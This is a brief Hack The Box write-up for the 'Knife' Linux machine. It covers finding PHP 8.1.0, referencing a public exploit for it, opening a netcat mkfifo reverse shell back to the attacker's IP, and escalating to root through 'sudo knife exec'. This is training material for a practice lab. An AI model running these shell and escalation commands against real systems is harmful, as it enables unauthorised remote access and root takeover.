KNIFE HTB WALKTHROUGH

Hello everyone , in this story I will be sharing my writeup for Knife is an active and easy Linux machine at Hackthebox.

NMAP

Now, I start Nmap scan.

PORT 80 (HTTP)

We can see that with extension called Weppalyzer, PHP 8.1.0 is used on the web server. After that, we check, are there any exploitation method in this PHP version.

I found PHP version 8.1.0 exploitation method at Exploit Database and download it. (https://www.exploit-db.com/exploits/49933)

We have accessed the system with the James user authority. Now, my next step will be spawning a reverse shell with Netcat. Hence, I start to listen on the port 9876.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip address> 9876 >/tmp/f

Now, we get User flag. After that, we need privilege escalation to get other flag.

Enter this command to get a root shell.

sudo knife exec — exec “exec ‘/bin/sh -i’ “

Now I can get root flag.